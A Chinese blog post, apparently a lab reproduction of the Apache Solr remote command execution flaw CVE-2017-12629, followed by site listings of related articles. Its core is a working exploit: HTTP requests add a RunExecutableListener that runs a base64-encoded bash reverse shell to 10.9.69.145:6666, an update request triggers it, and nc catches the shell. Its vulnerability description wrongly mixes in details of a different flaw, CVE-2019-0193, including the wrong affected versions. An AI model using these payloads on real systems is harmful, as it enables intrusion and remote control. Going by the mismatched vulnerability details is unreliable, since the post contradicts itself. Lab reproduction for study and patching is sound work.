Apache Solr 远程命令执行漏洞(CVE-2017-12629)

最新推荐文章于 2023-05-13 21:06:50 发布
最新推荐文章于 2023-05-13 21:06:50 发布
阅读量2.5k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: apache 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45022281/article/details/120745979
版权

Apache Solr 远程命令执行漏洞(CVE-2017-12629)

漏洞描述:

2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。此次漏洞出现在Apache
Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。

风险等级:

影响版本:

Apache Solr < 8.2.0

漏洞复现:
[1] 查看任务列表

GET /solr/demo/config HTTP/1.1
Host: 10.9.69.145:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

在这里插入图片描述

[2] 直接反弹不生效,可能是>&等特殊字符导致,我们使用bash64编码后的代码进行反弹

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjY5LjE0NS82NjY2IDA+JjE=|base64 -d|bash -i

在这里插入图片描述

[3] 创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数,设置exe的值为反弹shell的命令
在这里插入图片描述

POST /solr/demo/config HTTP/1.1
Host: 10.9.69.145:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 219

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjY5LjE0NS82NjY2IDA+JjE=|base64 -d|bash -i"]}}

[4] 进行update操作,触发刚才添加的listener(多发几次):
在这里插入图片描述

POST /solr/demo/update HTTP/1.1
Host: 10.9.69.145:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]

[5] 本地监听6666端口,成功反弹shell
在这里插入图片描述

nc -lvvp 6666

基础环境:
https://vulhub.org/#/environments/solr/CVE-2017-12629-XXE/

漏洞修复:

1、添加Solr访问控制,包括禁止本地直接未授权访问;
2、升级版本至7.1,该版本已经解决了XML解析问题并删除了RunExecutableListener类;
3、针对XXE可手动修改CoreParser.java文件,按照通常防止基于DOM解析产生XXE的防范方法修复即可;

汐泊槐
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。...文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
漏洞复现----3、Apache Solr 远程命令执行漏洞CVE-2017-12629
七天
11-30 2311
文章目录一、Apache Solr 简介二、CVE-2017-12629简介三、漏洞复现3.1、使用postCommit3.2、使用newSearcher 一、Apache Solr 简介 Solr是基于Lucene的面向企业搜索的web应用,是一个独立的企业级搜索应用服务器。它对外提供类似于Web-service的API接口。 用户可以通过HTTP请求,向搜索引擎服务器提交一定格式的XML文件,生成索引; 也可以通过HTTP GET操作提出查找请求,并得到Xml/json格式的返回结果。 Lucene
Apache Solr远程代码执行漏洞CVE-2017-12629
3569
01-22 5636
http://www.freebuf.com/sectool/159970.html 一 漏洞简介 Apache SolrApache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。 二 漏洞利用 2.1. 环境介绍 Ubuntu14 64位环境(sol
Apache Solr 远程命令执行漏洞CVE-2017-12629)复现
HEAVEN569的博客
06-21 1243
Apache Solr 远程命令执行漏洞CVE-2017-12629)复现
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
Apache Tomcat CVE-2019-0232 远程代码执行漏洞 - tdcoming'blog QQ group 90
08-04
背景:近日,ApacheSolr官方团队在最新的安全更新中披露了一则ApacheSolrDeserialization远程代…阅读数 1386557篇文章排名:
Apache Solrsolr-8.11.1-src.tgz)
01-10
Apache Solrsolr-8.11.1-src.tgz)Source release
(CVE-2017-12629)Apache Solr远程代码执行复现
EC_Carrot的博客
03-08 292
漏洞介绍 Apache Solr Apache Solr是一个来自Apache Lucene(Lucene是一个开源的搜索引擎软件库),使用Java语言编写的开源的企业搜索平台,其主要功能包括全文搜索,实时索引,动态集群等功能。原理大致是文档通过HTTP利用XML加到一个搜索集合中,查询该集合也是通过HTTP收到一个XML/JSON响应来实现,在7.1.0及之前版本存在远程命令执行漏洞(RCE)。 Apache ZooKeeper Apache ZooKeeper是一个Apache基金会的一个软件项目,用于
CVE-2017-12629Apache Solr XXE&&RCE
最新发布
qq_61553520的博客
05-13 841
pache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。漏洞影响版本:Apache Solr before 7.1 with Apache Lucene before 7.1。
Apache solr XML&RCE 漏洞(CVE-2017-12629)
weixin_44047654的博客
02-22 603
Apache Solr XXE & RCE 漏洞(CVE-2017-12629)
漏洞复现|Apache Solr 远程命令执行漏洞
weixin_42282189的博客
10-19 467
作者:r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 CVE-2017-12629 0x01 漏洞描述 Apache Solr 是一个基于Java语言利用HTTP&Apache Lucene 来实现的开源的搜索服务器。原理是文档通过Http利用XML加到一个搜索集合中,查询是通过 http收到一个XML/JSON响应来进行查询操作。 0x02 影响版本 Apache Solr < 7.1 Apache Lucene < 7.1 0x03 测试环.
CVE-2017-12629 xxe漏洞复现
xinyue9966的博客
03-21 1059
一、实验介绍 1.漏洞介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。 2.影响版本 Apache Solr before 7.1 with Apache Lucene before 7.1 E
[漏洞复现] Apache Solr RCE(CVE-2017-12629)
Vicl1fe的博客
06-07 1236
前言 什么是Lucene Lucene 是一个高效的,基于 Java 的全文检索库。 Lucene 是 apache 软件基金会 4 jakarta 项目组的一个子项目,是一个开放源代码的全 文检索引擎工具包,但它不是一个完整的全文检索引擎,而是一个全文检索引擎的架构, Lucene主要提供了一个简单、强大的应用程序接口。 什么是solr Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口
[漏洞复现]Apache Solr Velocity模板远程代码执行
a1b2c3是弱口令
10-31 805
Apache Solr Velocity模板远程代码执行 0X00 漏洞描述 近日,国外安全研究员s00py公开了一个Apache Solr的Velocity模板注入的漏洞.该漏洞可以攻击最新版本的Solr.目前该漏洞利用详情已经广泛流传于Github以及各大安全群,且公开的EXP可以执行任意命令并自带回显.官方暂未发布补丁. 0X01 漏洞CVE 暂无 0X02 影响范围 包括但不限于8.2...
cve-2017-12629 apache solr xxe & rce 漏洞分析
whatday的专栏
06-26 1988
Versions Affected Apache Solr before 7.1.0 with Apache Lucene before 7.1 Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Description Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查
CVE-2017-12629Apache Solr RCE命令执行漏洞复现
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
02-16 4338
当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改.apache solr默认继承VelocityResponseWriter插件.Apache solr远程命令执行(CVE-2019-0193).
cve-2022-23222 复现
04-28
CVE-2022-23222是一个相关于Apache Solr漏洞,恶意攻击者通过该漏洞可以导致Solr服务拒绝响应或服务中断。要复现这个漏洞,需要进行以下操作: 1. 安装并配置Apache Solr服务; 2. 发送一个HTTP请求,其中查询...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值